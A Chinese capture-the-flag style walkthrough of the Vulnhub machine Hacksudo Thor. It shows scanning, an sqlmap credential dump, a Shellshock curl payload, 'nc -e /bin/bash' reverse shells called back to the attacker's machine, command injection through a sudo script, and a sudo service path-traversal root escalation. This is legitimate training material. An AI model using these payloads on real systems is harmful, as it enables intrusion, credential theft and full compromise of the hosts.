Vulnhub之Hacksudo Thor靶机详细测试过程(提权成功)

这篇具有很好参考价值的文章主要介绍了Vulnhub之Hacksudo Thor靶机详细测试过程(提权成功)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Hacksudo Thor

作者:jason huawen

靶机信息

名称:hacksudo: Thor

地址:

https://www.vulnhub.com/entry/hacksudo-thor,733/

识别目标主机IP地址

(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                        
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:19:6b:c1      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.160  08:00:27:94:4e:34      1      60  PCS Systemtechnik GmbH      

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.160

NMAP扫描

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.160 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-25 21:49 EDT
Nmap scan report for localhost (192.168.56.160)
Host is up (0.00018s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp open     ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 37:36:60:3e:26:ae:23:3f:e1:8b:5d:18:e7:a7:c7:ce (RSA)
|   256 34:9a:57:60:7d:66:70:d5:b5:ff:47:96:e0:36:23:75 (ECDSA)
|_  256 ae:7d:ee:fe:1d:bc:99:4d:54:45:3d:61:16:f8:6c:87 (ED25519)
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:94:4E:34 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.95 seconds

NMAP扫描结果显示目标主机有2个开放端口:22(ssh)、80(http),21端口状态为过滤

获得Shell

──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ nikto -h http://192.168.56.160
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.160
+ Target Hostname:    192.168.56.160
+ Target Port:        80
+ Start Time:         2023-04-25 21:52:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-04-25 21:53:39 (GMT-4) (62 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ gobuster dir -u http://192.168.56.160 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt,.js,.bak
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.160
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              html,sh,txt,js,bak,php
[+] Timeout:                 10s
===============================================================
2023/04/25 21:54:31 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.160/images/]
/.html                (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 5357]
/contact.php          (Status: 200) [Size: 4164]
/news.php             (Status: 200) [Size: 8062]
/home.php             (Status: 200) [Size: 5345]
/header.php           (Status: 200) [Size: 472]
/connect.php          (Status: 200) [Size: 0]
/navbar.php           (Status: 200) [Size: 1515]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.160/fonts/]
/transactions.php     (Status: 302) [Size: 8163] [--> home.php]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
/customer_profile.php (Status: 302) [Size: 7274] [--> home.php]
Progress: 1540415 / 1543927 (99.77%)

Gobuster工具没有扫描出有价值的目录或者文件,更换字典继续扫描:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ gobuster dir -u http://192.168.56.160 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x .php,.html,.sh,.txt,.js,.bak 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.160
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              sh,txt,js,bak,php,html
[+] Timeout:                 10s
===============================================================
2023/04/25 21:59:22 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.56.160/images/]
/contact.php          (Status: 200) [Size: 4164]
/news.php             (Status: 200) [Size: 8062]
/home.php             (Status: 200) [Size: 5345]
/index.php            (Status: 200) [Size: 5357]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.160/fonts/]
/header.php           (Status: 200) [Size: 472]
/connect.php          (Status: 200) [Size: 0]
/server-status        (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/navbar.php           (Status: 200) [Size: 1515]
/transactions.php     (Status: 302) [Size: 8163] [--> home.php]
/admin_login.php      (Status: 200) [Size: 1511]

更换字典后,扫描出/admin_login.php文件,接下来看如何突破用户登录:

首先看能否利用登录绕开语句,但是没有成功。

利用Burpsuite拦截用户登录请求,存储为文件req.txt,

─(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sqlmap -r req.txt --level=3                                                             
        ___
       __H__                                                                                                                                                 
 ___ ___["]_____ ___ ___  {1.6.7#stable}                                                                                                                     
|_ -| . [,]     | .'| . |                                                                                                                                    
|___|_  [(]_|_|_|__,|  _|                                                                                                                                    
      |_|V...       |_|   https://sqlmap.org                                                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:08:45 /2023-04-25/


但是SQLMAP没有扫描出SQL注入漏洞,在感觉不知道下一步怎么干的时候,尝试一下另外一个目录扫描工具dirsearch,这次有收获:

─(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ dirsearch -u http://192.168.56.160

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                             
 (_||| _) (/_(_|| (_| )                                                                                                                                      
                                                                                                                                                             
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/192.168.56.160/_23-04-25_22-12-41.txt

Error Log: /home/kali/.dirsearch/logs/errors-23-04-25_22-12-41.log


dirsearch扫描出目标有/README.md文件,访问该文件,好像有用户名和密码信息

However some important usernames and passwords are provided below :
* Username of admin is "admin" & password is "password123".
* Username of most of the customers is their "first_name" & password is their "first_name" followed by "123".

可以成功登陆/admin_login.php

这页是否存在SQL注入漏洞?

利用Burpsuite拦截该页请求,存储为文件req2.txt,再用sqlmap扫描一下

─(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sqlmap -r req2.txt --level=3
GET parameter 'cust_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 

说明目标站点的cust_id存在SQL注入漏洞。

─(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sqlmap -r req2.txt --level=3 --dbs
available databases [4]:
[*] hacksudo
[*] information_schema
[*] mysql
[*] performance_schema


得到数据库列表

─(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sqlmap -r req2.txt --level=3 -D hacksudo --tables
Database: hacksudo
[12 tables]
+--------------+
| admin        |
| beneficiary1 |
| beneficiary2 |
| beneficiary3 |
| beneficiary4 |
| customer     |
| news         |
| news_body    |
| passbook1    |
| passbook2    |
| passbook3    |
| passbook4    |
+--------------+

(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sqlmap -r req2.txt --level=3 -D hacksudo -T admin --columns
Database: hacksudo
Table: admin
[3 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| id     | int(11)  |
| pwd    | char(25) |
| uname  | char(25) |
+--------+----------+

这个表的信息已经没有价值,看一下其他表。

─(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sqlmap -r req2.txt --level=3 -D hacksudo -T customer -C uname,pwd --dump+---------+-----------+
| uname   | pwd       |
+---------+-----------+
| zakee94 | nafees123 |
| salman  | salman123 |
| jon     | snow123   |
| tushar  | tushar123 |


将上述用户名和密码分别作为字典登录ssh,均失败,但注意到news.php文件源代码中有注释:

<!-- cgi-bin ---!> 

所以/cgi-bin/目录下可能有cgi文件

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ dirsearch -u http://192.168.56.160/cgi-bin/ -f -e cgi 

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                             
 (_||| _) (/_(_|| (_| )                                                                                                                                      
                                                                                                                                                             
Extensions: cgi | HTTP method: GET | Threads: 30 | Wordlist size: 13603

Output File: /home/kali/.dirsearch/reports/192.168.56.160/-cgi-bin-_23-04-25_23-25-10.txt

Error Log: /home/kali/.dirsearch/logs/errors-23-04-25_23-25-10.log

Target: http://192.168.56.160/cgi-bin/

[23:25:10] Starting: 
[23:25:12] 403 -  279B  - /cgi-bin/.ht_wsr.txt                             
[23:25:12] 403 -  279B  - /cgi-bin/.htaccess.orig                          
[23:25:12] 403 -  279B  - /cgi-bin/.htaccess.bak1
[23:25:12] 403 -  279B  - /cgi-bin/.htaccessBAK
[23:25:12] 403 -  279B  - /cgi-bin/.htaccess.sample                        
[23:25:12] 403 -  279B  - /cgi-bin/.htaccess_sc
[23:25:12] 403 -  279B  - /cgi-bin/.htaccessOLD
[23:25:12] 403 -  279B  - /cgi-bin/.htaccess.save
[23:25:12] 403 -  279B  - /cgi-bin/.htaccessOLD2
[23:25:12] 403 -  279B  - /cgi-bin/.htaccess_orig
[23:25:12] 403 -  279B  - /cgi-bin/.htm
[23:25:12] 403 -  279B  - /cgi-bin/.htaccess_extra
[23:25:12] 403 -  279B  - /cgi-bin/.html
[23:25:12] 403 -  279B  - /cgi-bin/.htpasswd_test
[23:25:12] 403 -  279B  - /cgi-bin/.httr-oauth                             
[23:25:12] 403 -  279B  - /cgi-bin/.htpasswds
[23:25:13] 403 -  279B  - /cgi-bin/.php                                    
[23:25:31] 500 -  612B  - /cgi-bin/backup.cgi           

可能存在破壳漏洞

──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/backup.cgi,cmd=ls 192.168.56.160
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-25 23:30 EDT
Nmap scan report for bogon (192.168.56.160)
Host is up (0.00029s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-shellshock: 
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.
|             
|     Disclosure date: 2014-09-24
|     Exploit results:
|       <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
|   <html><head>
|   <title>500 Internal Server Error</title>
|   </head><body>
|   <h1>Internal Server Error</h1>
|   <p>The server encountered an internal error or
|   misconfiguration and was unable to complete
|   your request.</p>
|   <p>Please contact the server administrator at 
|    webmaster@localhost to inform them of the time this error occurred,
|    and the actions you performed just before this error.</p>
|   <p>More information about this error may be available
|   in the server error log.</p>
|   <hr>
|   <address>Apache/2.4.38 (Debian) Server at bogon Port 80</address>
|   </body></html>
|   
|     References:
|       http://seclists.org/oss-sec/2014/q3/685
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.45 seconds

NMAP脚本扫描结果可知目标站点存在shellshock漏洞

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'id'" \http://192.168.56.160/cgi-bin/backup.cgi

uid=33(www-data) gid=33(www-data) groups=33(www-data)

接下来设法得到反弹的shell

──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'nc -e /bin/bash 192.168.56.230 5555'" http://192.168.56.160/cgi-bin/backup.cgi

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sudo nc -nlvp 5555
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.160] 49396
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.3$ cd /home
cd /home
bash-4.3$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root root 4.0K Aug  2  2021 .
drwxr-xr-x 18 root root 4.0K Jul 29  2021 ..
drwxrwx---  5 thor thor 4.0K Aug  2  2021 thor
bash-4.3$ cd thor
cd thor
bash: cd: thor: Permission denied
bash-4.3$ sudo -l
sudo -l
Matching Defaults entries for www-data on HackSudoThor:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on HackSudoThor:
    (thor) NOPASSWD: /home/thor/./hammer.sh

bash-4.3$ sudo -u thor /home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.sh

HELLO want to talk to Thor?

Enter Thor  Secret Key : ljgg
ljgg
Hey Dear ! I am ljgg , Please enter your Secret massage : id
id
uid=1001(thor) gid=1001(thor) groups=1001(thor)
Thank you for your precious time!

发现可以输入任意的secret key,然后在Secret message处即可执行命令,因此下一步可以spawn一个新的shell,而得到用户thor

bash-4.3$ sudo -u thor /home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.sh

HELLO want to talk to Thor?

Enter Thor  Secret Key : ddd
ddd
Hey Dear ! I am ddd , Please enter your Secret massage : nc -e /bin/bash 192.168.56.230 6666
nc -e /bin/bash 192.168.56.230 6666

在Kali Linux上成功得到了用户thor的shell文章来源地址https://www.toymoban.com/news/detail-425828.html

──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sudo nc -nlvp 6666
[sudo] password for kali: 
listening on [any] 6666 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.160] 42452
id
uid=1001(thor) gid=1001(thor) groups=1001(thor)
python -c 'import pty;pty.spawn("/bin/bash")'
thor@HacksudoThor:/home$ 

提权

thor@HacksudoThor:~$ sudo -l
sudo -l
Matching Defaults entries for thor on HackSudoThor:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User thor may run the following commands on HackSudoThor:
    (root) NOPASSWD: /usr/bin/cat, /usr/sbin/service
thor@HacksudoThor:~$ sudo /usr/sbin/service ../../bin/sh
sudo /usr/sbin/service ../../bin/sh
# cd /root
cd /root
# ls -alh
ls -alh
total 64K
drwx------  6 root root 4.0K Jul 30  2021 .
drwxr-xr-x 18 root root 4.0K Jul 29  2021 ..
-rw-------  1 root root  302 Aug  2  2021 .bash_history
-rw-r--r--  1 root root  598 Jun 24  2021 .bashrc
drwxr-xr-x  3 root root 4.0K Jun 24  2021 .cache
drwx------  3 root root 4.0K Jun 11  2021 .gnupg
-rw-------  1 root root   28 Jun 24  2021 .lesshst
drwxr-xr-x  3 root root 4.0K Jun 11  2021 .local
-rw-------  1 root root 2.4K Jul 30  2021 .mysql_history
-rw-r--r--  1 root root  144 Jun 23  2021 .pearrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4.0K Aug  2  2021 .ssh
-rw-r--r--  1 root root  493 Jun 15  2021 .wget-hsts
-rw-r--r--  1 root root 7.0K Jul 30  2021 proof.txt
-rw-------  1 root root    7 Aug  2  2021 root.txt
# cat root.txt
cat root.txt
rooted
# 

到了这里,关于Vulnhub之Hacksudo Thor靶机详细测试过程(提权成功)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Vulnhub之M87靶机详细测试过程(不同提权方法)

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.250 NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、9090(ssl) 浏览器访问80端口,为用户登录界面,需要输入email和密码。 nikto工具发现了/admin目录,访问该目录,为用户登录界面, 80端口发现了/admin目录,

    2023年04月10日
    浏览(31)
  • Vulnhub之Cengbox 2靶机详细测试过程(利用不同的方法提权)

    域名:ceng-company.vm 可能的用户名: kevin, aaron 其他:kevin可能密码比较弱 但是访问域名ceng-company.vm,返回页面内容没有发生变化 目录扫描没有啥收获,是否存在子域名? 发现admin子域名返回状态码为403 将该子域名加入到/etc/hosts文件: 访问admin.ceng-company.vm返回“Forbidden\\\",是

    2024年02月10日
    浏览(30)
  • Vulnhub之Ino靶机详细测试过程(采用完全不同方法获得Shell以及本地提权)

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.253 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http) 访问80端口,从返回的页面看CMS为Lot Reservation Management System 但目前不知道版本,先看一下有无其他目录可利用。 会被自动重定向到/lot目录。 用Gobuster工具无

    2023年04月16日
    浏览(44)
  • Vulnhub之Decoy靶机-详细提权过程补充

    在拿到用户296640a3b825115a47b68fc44501c828的密码server后,为了方便观察现象,同时开启两个shell,并且需要指定-t \\\"bash --noprofile\\\"以逃避受限shell,登录成功后,要修改PATH环境变量,使其包含正常的环境变量: 在日志文件中看到有关chkrootkit的日志信息,chkrootkit是检查系统是否存在后门的

    2024年02月06日
    浏览(31)
  • Vulnhub之Gigroot靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.103 NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、11211(?) 将wp.gitroot.vuln加入/etc/hosts文件中: 此时访问url,从返回页面可知目标为Wordpress站点: 因为我们已知目标运行wordpress站点,因此从gobuster和nikto工具运

    2024年02月01日
    浏览(36)
  • Vulnhub之GreenOptics靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 NMAP扫描结果表明目标主机有5个开放端口:21(ftp)、22(ssh)、53(dns)、80(http)、10000(http) 说明需要添加主机记录到/etc/hosts文件: 再次访问: 返回页面为用户登录界面,10000端口的信息收集暂时告一段落。 nikto没有得到

    2024年02月01日
    浏览(39)
  • Vulnhub之Maskcrafter靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 john没有破解出credit.zip密码,而且作者有提示,不需要使用破解方法。 目标主机没有NFS共享目录。 Kali Linux访问80端口,为用户登录界面,用admin\\\' or 1=1 -- 即可轻松绕过。 登录成功后,在页面源代码中有注释: 访问

    2023年04月10日
    浏览(29)
  • Vulnhub之Inclusiveness靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.111 NMAP扫描结果表明目标主机有3个开放端口:21(ftp)、22(ssh)、80(http) 对FTP服务的信息收集结果如下: 目标主机允许匿名访问 匿名用户允许上传文件 匿名用户无法变换目录 FTP服务版本没有漏洞可利用 接下来做一下目

    2023年04月19日
    浏览(40)
  • Vulnhub之Healthcare靶机详细测试过程

    作者: jason huawen 名称: 地址: 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 NMAP扫描结果表明目标主机有2个开放端口:21(ftp)、80(http) FTP不允许匿名访问 FTP服务为ProFTPD,可能存在mod_copy漏洞 robots.txt存在/admin/条目,但是访问该目录,却返回页面不存在的错误

    2023年04月22日
    浏览(53)
  • Vulnhub之HF 2019靶机详细测试过程

    作者:jason huawen 名称:Hacker Fest: 2019 地址: 将虚拟机镜像导入到VirtualBox中,并设置网络模式为host-only,然后启动Kali Linux以及目标主机(虚拟机): 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 从NMAP扫描结果表明目标主机有4个开放端口:21(ftp)、22(ssh)、8

    2023年04月22日
    浏览(41)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包